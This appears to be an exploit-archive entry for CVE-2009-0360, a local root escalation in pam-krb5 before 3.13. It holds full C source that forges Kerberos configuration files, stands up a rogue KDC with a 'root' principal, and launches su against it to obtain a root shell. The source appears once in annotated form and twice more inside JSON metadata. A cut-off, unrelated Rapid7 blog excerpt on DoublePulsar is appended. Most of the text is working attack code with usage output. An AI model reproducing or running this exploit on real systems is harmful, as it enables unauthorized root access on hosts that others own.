pam-krb5 < 3.13 Local Privilege Escalation Exploit
2009-03-29T00:00:00
ID 1337DAY-ID-7919 Type zdt Reporter Jon Oberheide Modified 2009-03-29T00:00:00
Description
Exploit for linux platform in category local exploits
==================================================
pam-krb5 < 3.13 Local Privilege Escalation Exploit
==================================================
/*
* cve-2009-0360.c
*
* pam-krb5 < 3.13 local privilege escalation
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360
*
* pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly
* initialize the Kerberos libraries for setuid use, which allows local
* users to gain privileges by pointing an environment variable to a
* modified Kerberos configuration file, and then launching a PAM-based
* setuid application.
*
* Usage:
*
* $ gcc cve-2009-0360.c -o cve-2009-0360
* $ ./cve-2009-0360
* [+] creating krb5.conf
* [+] creating kdc.conf
* [+] creating kerberos database
* Loading random data
* Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',
* master key name 'K/M@TEST.COM'
* [+] adding principal root@TEST.COM
* Authenticating as principal root@TEST.COM with password.
* Enter KDC database master key:
* WARNING: no policy specified for root@TEST.COM; defaulting to no policy
* Principal "root@TEST.COM" created.
* [+] launching krb5kdc on 141.212.110.163:6666
* [+] launching su with fake KDC configuration
* [+] enter "root" at the password prompt
* Password:
* # id
* uid=0(root) gid=0(root) ...
*
* Notes:
*
* This exploit will result in local privilege escalation on hosts that use
* the pam-krb5 module for su authentication. Check the su and system-auth
* PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.
* It also needs the MIT Kerberos KDC tools (kdb5_util, kadmin.local and
* krb5kdc, see KUTIL_PATH, KADMIN_PATH and KRB5KDC_PATH below) installed on
* the target and runnable by the unprivileged user, because it stands up its
* own KDC there rather than contacting a remote one. Some customization of
* the defined constants and paths may be necessary for your environment.
* Be sure to set FAKE_KDC_HOST to the IP address of an active non-loopback
* interface on the target machine; the compiled-in default will not match
* your host.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
/* Realm served by the fake KDC and written into the forged krb5.conf as
 * su's default realm. */
#define REALM "TEST.COM"
/* Address and port the fake KDC listens on; both the kdc and admin_server
 * entries of the forged krb5.conf point here.  Must be a reachable,
 * non-loopback address of the target host (see Notes above). */
#define FAKE_KDC_HOST "141.212.110.163"
#define FAKE_KDC_PORT "6666"
/* Principal created in the fake realm and the password to type at su's
 * prompt.  su is run without a target user, so it asks for root; pam-krb5
 * presumably maps that account to PRINCIPAL_NAME@REALM -- not verifiable
 * from this file. */
#define PRINCIPAL_NAME "root"
#define PRINCIPAL_PASS "root"
/* Scratch directory under world-writable /tmp that receives the forged
 * krb5.conf and kdc.conf, the KDC database and the master-key stash (the
 * master password is set to "" when the database is created). */
#define TMP_DIR "/tmp/cve-2009-0360"
/* MIT Kerberos administration tools, run as the unprivileged user to build
 * and serve the fake realm. */
#define KUTIL_PATH "/usr/sbin/kdb5_util"
#define KADMIN_PATH "/usr/sbin/kadmin.local"
#define KRB5KDC_PATH "/usr/sbin/krb5kdc"
/* Client-side krb5.conf handed to su through KRB5_CONFIG: default realm is
 * REALM, every KDC/admin-server lookup for REALM resolves to the fake KDC,
 * and both ".REALM" and "REALM" domains map to REALM. */
#define KRB5_CONF \
"[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \
" = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \
"default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \
"\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM
/* Server-side kdc.conf handed to krb5kdc through KRB5_KDC_PROFILE: the KDC
 * listens on FAKE_KDC_PORT and keeps database, keytab, ACL file and stash
 * under TMP_DIR. */
#define KDC_CONF \
"[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \
" = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \
"FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \
"\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \
"\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}"
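/*
 * Run one shell step of the exploit and report failure.
 *
 * cmd  - command line handed to system(3)
 * what - short tool name used in the error message
 *
 * Returns 0 when the child exited with status 0, -1 otherwise.  Callers keep
 * going on failure, as the original did: a step may fail for benign reasons,
 * e.g. the database or principal already existing from an earlier run.
 */
static int
run_step(const char *cmd, const char *what)
{
    int status = system(cmd);

    if (status == -1) {
        printf("[-] Error: cannot run %s (%s), continuing exploit anyway\n",
               what, strerror(errno));
        return -1;
    }
    /* WEXITSTATUS is only meaningful for a normally exited child; a child
     * killed by a signal is a failure too and must not be misread. */
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
        printf("[-] Error: %s command returned non-zero, "
               "continuing exploit anyway\n", what);
        return -1;
    }
    return 0;
}

/*
 * Write `contents` to `path`, truncating any existing file.
 *
 * what - file name used in error messages
 *
 * Returns 0 on success, -1 on any failure.  A short write or a failed flush
 * on close would leave a truncated config that silently misroutes the
 * exploit, so both are treated as errors instead of being ignored.
 */
static int
write_config(const char *path, const char *contents, const char *what)
{
    size_t len = strlen(contents);
    FILE *fp = fopen(path, "w");

    if (fp == NULL) {
        printf("[-] Error: cannot open %s (%s)\n", what, strerror(errno));
        return -1;
    }
    if (fwrite(contents, 1, len, fp) != len) {
        printf("[-] Error: cannot write %s (%s)\n", what, strerror(errno));
        fclose(fp);
        return -1;
    }
    if (fclose(fp) != 0) {
        printf("[-] Error: cannot close %s (%s)\n", what, strerror(errno));
        return -1;
    }
    return 0;
}

/*
 * Create TMP_DIR, or accept an existing one only if it is a plain directory
 * owned by the invoking user.
 *
 * TMP_DIR lives in world-writable /tmp, so a path of that name may have been
 * planted by another local user (a symlink, or a directory they own) to
 * intercept or replace the forged krb5.conf/kdc.conf and the KDC database
 * that are written there next.  The original accepted any pre-existing path.
 *
 * Returns 0 on success, -1 on failure (already reported).
 */
static int
prepare_tmpdir(void)
{
    struct stat st;

    /* Mode kept at 0755 as in the original.  su's PAM stack runs as root and
     * can read the forged config either way, but it is not confirmed here
     * that pam-krb5 never switches to the target uid first, so the
     * directory is deliberately not tightened to 0700. */
    if (mkdir(TMP_DIR, 0755) == 0)
        return 0;
    if (errno != EEXIST) {
        printf("[-] Error: cannot create TMP_DIR (%s)\n", strerror(errno));
        return -1;
    }
    /* lstat, not stat: a symlink is rejected even if its target is ours. */
    if (lstat(TMP_DIR, &st) == -1) {
        printf("[-] Error: cannot stat TMP_DIR (%s)\n", strerror(errno));
        return -1;
    }
    if (!S_ISDIR(st.st_mode) || st.st_uid != getuid()) {
        printf("[-] Error: " TMP_DIR " exists but is not a directory owned by "
               "uid %lu, refusing to use it\n", (unsigned long) getuid());
        return -1;
    }
    return 0;
}

/*
 * Exploit driver: forge a Kerberos realm under TMP_DIR, start a KDC for it
 * that knows PRINCIPAL_NAME with password PRINCIPAL_PASS, then run su with
 * KRB5_CONFIG pointed at the forged krb5.conf so pam-krb5 authenticates
 * against the fake KDC instead of the real one.
 *
 * Returns 0 after su exits, 1 if the scratch directory, a config file or the
 * chdir could not be set up.  Failures of the Kerberos tools themselves are
 * reported but not fatal.  The one-second sleeps only pace the status output.
 */
int
main(void)
{
    if (prepare_tmpdir() == -1)
        return 1;

    printf("[+] creating krb5.conf\n");
    sleep(1);
    if (write_config(TMP_DIR "/krb5.conf", KRB5_CONF, "krb5.conf") == -1)
        return 1;

    printf("[+] creating kdc.conf\n");
    sleep(1);
    if (write_config(TMP_DIR "/kdc.conf", KDC_CONF, "kdc.conf") == -1)
        return 1;

    /* The original changed into TMP_DIR before running the Kerberos tools
     * (every path passed to them is absolute, so the reason is not visible
     * here); do the same, but never carry on from an unexpected directory. */
    if (chdir(TMP_DIR) == -1) {
        printf("[-] Error: cannot chdir to TMP_DIR (%s)\n", strerror(errno));
        return 1;
    }

    /* Fresh KDC database with an empty master password (-P ""), stashed
     * (-s/-sf) so krb5kdc can start without prompting for it. */
    printf("[+] creating kerberos database\n");
    sleep(1);
    run_step(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR
             "/stash -r " REALM " -s -P \"\"",
             "kdb5_util");

    /* kadmin.local -m reads the (empty) master password from stdin. */
    printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n");
    sleep(1);
    run_step("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM
             " -d " TMP_DIR "/principal -r " REALM " -q \"add_principal "
             "-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\"",
             "kadmin.local");

    /* krb5kdc is expected to put itself in the background so that system()
     * returns; if it stayed in the foreground on some build, su below would
     * never be reached. */
    printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n");
    sleep(1);
    run_step("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH
             " -d " TMP_DIR "/principal -r " REALM,
             "krb5kdc");

    printf("[+] launching su with fake KDC configuration\n");
    sleep(1);
    printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n");
    sleep(1);

    /* Interactive root shell; its exit status says nothing about whether
     * the escalation worked, so it is deliberately not checked. */
    (void) system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su");

    return 0;
}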
{"hash": "0dd6b4b0675de7a8f74fbbadd5503e55028dccaa92a1e13eb9398bb84a1d4e7e", "id": "1337DAY-ID-7919", "lastseen": "2018-04-10T04:21:13", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "099ca755b8ab6cf6a0c4e75e8826fc04", "key": "href"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "modified"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8ebcd5c1bbda80c80d5c98bac81c73ce", "key": "reporter"}, {"hash": "f2c4c1e19174231e2aa237e48925be06", "key": "sourceData"}, {"hash": "30eb236def769c326b93fe760265201a", "key": "sourceHref"}, {"hash": "0d6bf551d9e5915315f9f0cdd6141c3e", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-04-10T04:21:13"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:7686740988509691507"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7919", "SECURITYVULNS:VULN:4294"]}], "modified": "2018-04-10T04:21:13"}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7919", "description": "Exploit for linux platform in category local exploits", "title": "pam-krb5 < 3.13 Local Privilege Escalation Exploit", "history": [{"bulletin": {"hash": "b0e1c4707c93124c7b0478ba7c711885a730fbf860d2794aad74bf16ebc63d72", "id": "1337DAY-ID-7919", "lastseen": "2016-04-20T01:11:32", "enchantments": {"score": {"value": 1.3, "vector": "AV:L/AC:M/Au:M/C:N/I:P/A:N/", "modified": 
"2016-04-20T01:11:32"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8ebcd5c1bbda80c80d5c98bac81c73ce", "key": "reporter"}, {"hash": "b2f2be0cfe67d31002bc18594e1e3294", "key": "href"}, {"hash": "0d6bf551d9e5915315f9f0cdd6141c3e", "key": "title"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "21f3e22aeb018d74a764d53bec87e567", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "modified"}, {"hash": "bf6641a2f2795b56834efb7048c91788", "key": "sourceHref"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/7919", "description": "Exploit for linux platform in category local exploits", "viewCount": 0, "title": "pam-krb5 < 3.13 Local Privilege Escalation Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================\r\npam-krb5 < 3.13 Local Privilege Escalation Exploit\r\n==================================================\r\n\r\n\r\n/*\r\n * cve-2009-0360.c\r\n *\r\n * pam-krb5 < 3.13 local privilege escalation\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360\r\n *\r\n * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly \r\n * initialize the Kerberos libraries for setuid use, which allows local \r\n * users to gain privileges by pointing an environment variable to a \r\n * modified Kerberos configuration file, and then launching a PAM-based \r\n * setuid application. 
\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0360.c -o cve-2009-0360\r\n * $ ./cve-2009-0360\r\n * [+] creating krb5.conf\r\n * [+] creating kdc.conf\r\n * [+] creating kerberos database\r\n * Loading random data\r\n * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',\r\n * master key name 'K/M@TEST.COM'\r\n * [+] adding principal root@TEST.COM\r\n * Authenticating as principal root@TEST.COM with password.\r\n * Enter KDC database master key: \r\n * WARNING: no policy specified for root@TEST.COM; defaulting to no policy\r\n * Principal \"root@TEST.COM\" created.\r\n * [+] launching krb5kdc on 141.212.110.163:6666\r\n * [+] launching su with fake KDC configuration\r\n * [+] enter \"root\" at the password prompt\r\n * Password: \r\n * # id\r\n * uid=0(root) gid=0(root) ...\r\n *\r\n * Notes:\r\n *\r\n * This exploit will result in local privilege escalation on hosts that use \r\n * the pam-krb5 module for su authentication. Check the su and system-auth\r\n * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.\r\n * Some customization of the defined constants and paths may be necessary \r\n * for your environment. 
Be sure to set FAKE_KDC_HOST to the IP address of\r\n * an active non-loopback interface on the target machine.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define REALM \"TEST.COM\"\r\n#define FAKE_KDC_HOST \"141.212.110.163\"\r\n#define FAKE_KDC_PORT \"6666\"\r\n#define PRINCIPAL_NAME \"root\"\r\n#define PRINCIPAL_PASS \"root\"\r\n#define TMP_DIR \"/tmp/cve-2009-0360\"\r\n#define KUTIL_PATH \"/usr/sbin/kdb5_util\"\r\n#define KADMIN_PATH \"/usr/sbin/kadmin.local\"\r\n#define KRB5KDC_PATH \"/usr/sbin/krb5kdc\"\r\n\r\n#define KRB5_CONF \\\r\n \"[libdefaults]\\n\\tdefault_realm = \" REALM \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tadmin_server = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\\t\\t\" \\\r\n \"default_domain = \" REALM \"\\n\\t\\tkdc = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \\\r\n \"\\n\\t}\\n\\n[domain_realm]\\n\\t.\" REALM \" = \" REALM \"\\n\\t\" REALM \" = \" REALM\r\n\r\n#define KDC_CONF \\\r\n \"[kdcdefaults]\\n\\tkdc_ports = \" FAKE_KDC_PORT \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tdatabase_name = \" TMP_DIR \"/principal\\n\\t\\tadmin_keytab = \" \\\r\n \"FILE:\" TMP_DIR \"/kadm5.keytab\\n\\t\\tacl_file = \" TMP_DIR \"/kadm5.acl\" \\\r\n \"\\n\\t\\tkey_stash_file = \" TMP_DIR \"/stash\\n\\t\\tkdc_ports = \" FAKE_KDC_PORT \\\r\n \"\\n\\t\\tmax_life = 10h 0m 0s\\n\\t\\tmax_renewable_life = 7d 0h 0m 0s\\n\\t}\"\r\n\r\nint\r\nmain(void)\r\n{\r\n int ret;\r\n FILE *fp;\r\n char *err;\r\n\r\n ret = mkdir(TMP_DIR, 0755);\r\n if (ret == -1 && errno != EEXIST) {\r\n err = \"cannot create TMP_DIR\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n\r\n printf(\"[+] creating krb5.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/krb5.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open krb5.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", 
err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);\r\n fclose(fp);\r\n\r\n printf(\"[+] creating kdc.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/kdc.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open kdc.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);\r\n fclose(fp);\r\n\r\n chdir(TMP_DIR);\r\n\r\n printf(\"[+] creating kerberos database\\n\");\r\n sleep(1);\r\n\r\n ret = system(KUTIL_PATH \" create -d \" TMP_DIR \"/principal -sf \" TMP_DIR \\\r\n \"/stash -r \" REALM \" -s -P \\\"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kdb5_util command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] adding principal \" PRINCIPAL_NAME \"@\" REALM \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"echo \\\"\\\" | \" KADMIN_PATH \" -m -p \" PRINCIPAL_NAME \"@\" REALM \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM \" -q \\\"add_principal \" \\\r\n \"-pw \" PRINCIPAL_PASS \" \" PRINCIPAL_NAME \"@\" REALM \"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kadmin.local command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching krb5kdc on \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"KRB5_KDC_PROFILE=\\\"\" TMP_DIR \"/kdc.conf\\\" \" KRB5KDC_PATH \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM);\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"krb5kdc command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching su with fake KDC configuration\\n\");\r\n sleep(1);\r\n printf(\"[+] enter \\\"\" PRINCIPAL_PASS \"\\\" at the password prompt\\n\");\r\n sleep(1);\r\n\r\n system(\"KRB5_CONFIG=\\\"\" TMP_DIR \"/krb5.conf\\\" su\");\r\n\r\n return 0;\r\n}\r\n\r\n\r \n\n# 0day.today [2016-04-20] #", 
"published": "2009-03-29T00:00:00", "references": [], "reporter": "Jon Oberheide", "modified": "2009-03-29T00:00:00", "href": "http://0day.today/exploit/description/7919"}, "lastseen": "2016-04-20T01:11:32", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================\r\npam-krb5 < 3.13 Local Privilege Escalation Exploit\r\n==================================================\r\n\r\n\r\n/*\r\n * cve-2009-0360.c\r\n *\r\n * pam-krb5 < 3.13 local privilege escalation\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360\r\n *\r\n * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly \r\n * initialize the Kerberos libraries for setuid use, which allows local \r\n * users to gain privileges by pointing an environment variable to a \r\n * modified Kerberos configuration file, and then launching a PAM-based \r\n * setuid application. 
\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0360.c -o cve-2009-0360\r\n * $ ./cve-2009-0360\r\n * [+] creating krb5.conf\r\n * [+] creating kdc.conf\r\n * [+] creating kerberos database\r\n * Loading random data\r\n * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',\r\n * master key name 'K/[email\u00a0protected]'\r\n * [+] adding principal [email\u00a0protected]\r\n * Authenticating as principal [email\u00a0protected] with password.\r\n * Enter KDC database master key: \r\n * WARNING: no policy specified for [email\u00a0protected]; defaulting to no policy\r\n * Principal \"[email\u00a0protected]\" created.\r\n * [+] launching krb5kdc on 141.212.110.163:6666\r\n * [+] launching su with fake KDC configuration\r\n * [+] enter \"root\" at the password prompt\r\n * Password: \r\n * # id\r\n * uid=0(root) gid=0(root) ...\r\n *\r\n * Notes:\r\n *\r\n * This exploit will result in local privilege escalation on hosts that use \r\n * the pam-krb5 module for su authentication. Check the su and system-auth\r\n * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.\r\n * Some customization of the defined constants and paths may be necessary \r\n * for your environment. 
Be sure to set FAKE_KDC_HOST to the IP address of\r\n * an active non-loopback interface on the target machine.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define REALM \"TEST.COM\"\r\n#define FAKE_KDC_HOST \"141.212.110.163\"\r\n#define FAKE_KDC_PORT \"6666\"\r\n#define PRINCIPAL_NAME \"root\"\r\n#define PRINCIPAL_PASS \"root\"\r\n#define TMP_DIR \"/tmp/cve-2009-0360\"\r\n#define KUTIL_PATH \"/usr/sbin/kdb5_util\"\r\n#define KADMIN_PATH \"/usr/sbin/kadmin.local\"\r\n#define KRB5KDC_PATH \"/usr/sbin/krb5kdc\"\r\n\r\n#define KRB5_CONF \\\r\n \"[libdefaults]\\n\\tdefault_realm = \" REALM \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tadmin_server = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\\t\\t\" \\\r\n \"default_domain = \" REALM \"\\n\\t\\tkdc = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \\\r\n \"\\n\\t}\\n\\n[domain_realm]\\n\\t.\" REALM \" = \" REALM \"\\n\\t\" REALM \" = \" REALM\r\n\r\n#define KDC_CONF \\\r\n \"[kdcdefaults]\\n\\tkdc_ports = \" FAKE_KDC_PORT \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tdatabase_name = \" TMP_DIR \"/principal\\n\\t\\tadmin_keytab = \" \\\r\n \"FILE:\" TMP_DIR \"/kadm5.keytab\\n\\t\\tacl_file = \" TMP_DIR \"/kadm5.acl\" \\\r\n \"\\n\\t\\tkey_stash_file = \" TMP_DIR \"/stash\\n\\t\\tkdc_ports = \" FAKE_KDC_PORT \\\r\n \"\\n\\t\\tmax_life = 10h 0m 0s\\n\\t\\tmax_renewable_life = 7d 0h 0m 0s\\n\\t}\"\r\n\r\nint\r\nmain(void)\r\n{\r\n int ret;\r\n FILE *fp;\r\n char *err;\r\n\r\n ret = mkdir(TMP_DIR, 0755);\r\n if (ret == -1 && errno != EEXIST) {\r\n err = \"cannot create TMP_DIR\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n\r\n printf(\"[+] creating krb5.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/krb5.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open krb5.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", 
err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);\r\n fclose(fp);\r\n\r\n printf(\"[+] creating kdc.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/kdc.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open kdc.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);\r\n fclose(fp);\r\n\r\n chdir(TMP_DIR);\r\n\r\n printf(\"[+] creating kerberos database\\n\");\r\n sleep(1);\r\n\r\n ret = system(KUTIL_PATH \" create -d \" TMP_DIR \"/principal -sf \" TMP_DIR \\\r\n \"/stash -r \" REALM \" -s -P \\\"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kdb5_util command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] adding principal \" PRINCIPAL_NAME \"@\" REALM \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"echo \\\"\\\" | \" KADMIN_PATH \" -m -p \" PRINCIPAL_NAME \"@\" REALM \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM \" -q \\\"add_principal \" \\\r\n \"-pw \" PRINCIPAL_PASS \" \" PRINCIPAL_NAME \"@\" REALM \"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kadmin.local command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching krb5kdc on \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"KRB5_KDC_PROFILE=\\\"\" TMP_DIR \"/kdc.conf\\\" \" KRB5KDC_PATH \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM);\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"krb5kdc command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching su with fake KDC configuration\\n\");\r\n sleep(1);\r\n printf(\"[+] enter \\\"\" PRINCIPAL_PASS \"\\\" at the password prompt\\n\");\r\n sleep(1);\r\n\r\n system(\"KRB5_CONFIG=\\\"\" TMP_DIR \"/krb5.conf\\\" su\");\r\n\r\n return 0;\r\n}\r\n\r\n\r \n\n# 0day.today [2018-04-10] #", 
"published": "2009-03-29T00:00:00", "references": [], "reporter": "Jon Oberheide", "modified": "2009-03-29T00:00:00", "href": "https://0day.today/exploit/description/7919"}
{"rapid7community": [{"lastseen": "2017-06-24T01:16:32", "bulletinFamily": "blog", "description": "<!-- [DocumentBodyStart:53f4c57c-eea0-4790-a908-f2f47ce880e1] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">After <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">WannaCry</a> </span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">hit systems around the world last month, security experts warned that the underlying vulnerabilities that allowed the ransomworm to spread are still unpatched in many environments, rendering those systems vulnerable to other hacking tools from the same toolset. Rapid7’s Project Heisenberg continues to see a high volume of scans and exploit attempts targeting SMB vulnerabilities:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7919-67213/Heisenberg-smb-3.png\"><img alt=\"Heisenberg-smb-3.png\" class=\"image-1 jive-image\" height=\"351\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7919-67213/1600-351/Heisenberg-smb-3.png\" style=\"width: 620px; height: 136px;\" width=\"1600\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">DoublePulsar, a backdoor that has infected hundreds of thousands of computers, is one of the most nefarious of these tools: It can not only distribute ransomware but is also able to infect a system’s kernel to gain privileges and steal credentials. Identifying and patching vulnerable systems remains the best way to defend against the DoublePulsar implant. 
